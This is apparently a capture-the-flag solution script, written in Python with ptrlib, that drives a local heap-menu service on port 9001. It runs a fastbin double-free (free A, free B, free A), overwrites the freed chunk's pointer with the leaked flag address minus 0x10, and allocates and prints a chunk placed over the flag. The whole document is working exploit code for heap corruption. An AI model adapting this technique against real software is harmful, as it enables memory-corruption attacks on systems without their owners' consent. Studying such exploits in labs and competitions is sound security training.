from ptrlib import *

sock = Socket("localhost", 9001)

sock.recvuntil("located at ")
addr_flag = int(sock.recvuntil(".").rstrip(b"."), 16)

# A = malloc(0x10)
sock.recvuntil("> ")
sock.sendline("1")
sock.recvuntil(": ")
sock.sendline("A")
# B = malloc(0x10)
sock.recvuntil("> ")
sock.sendline("1")
sock.recvuntil(": ")
sock.sendline("B")

# free(A)
sock.recvuntil("> ")
sock.sendline("2")
sock.recvuntil(": ")
sock.sendline("A")
# free(B)
sock.recvuntil("> ")
sock.sendline("2")
sock.recvuntil(": ")
sock.sendline("B")
# free(A)
sock.recvuntil("> ")
sock.sendline("2")
sock.recvuntil(": ")
sock.sendline("A")

# A = malloc(0x10)
sock.recvuntil("> ")
sock.sendline("1")
sock.recvuntil(": ")
sock.sendline("A")
# read(0, A, 0x10) --> addr_flag
sock.recvuntil("> ")
sock.sendline("4")
sock.recvuntil(": ")
sock.sendline("A")
sock.recvuntil("> ")
sock.send(p64(addr_flag - 0x10))
# B = malloc(0x10)
sock.recvuntil("> ")
sock.sendline("1")
sock.recvuntil(": ")
sock.sendline("B")
# C = malloc(0x10)
sock.recvuntil("> ")
sock.sendline("1")
sock.recvuntil(": ")
sock.sendline("C")
# A = malloc(0x10)
sock.recvuntil("> ")
sock.sendline("1")
sock.recvuntil(": ")
sock.sendline("A")

# printf("%s\n", A)
sock.recvuntil("> ")
sock.sendline("3")
sock.recvuntil(": ")
sock.sendline("A")

sock.interactive()
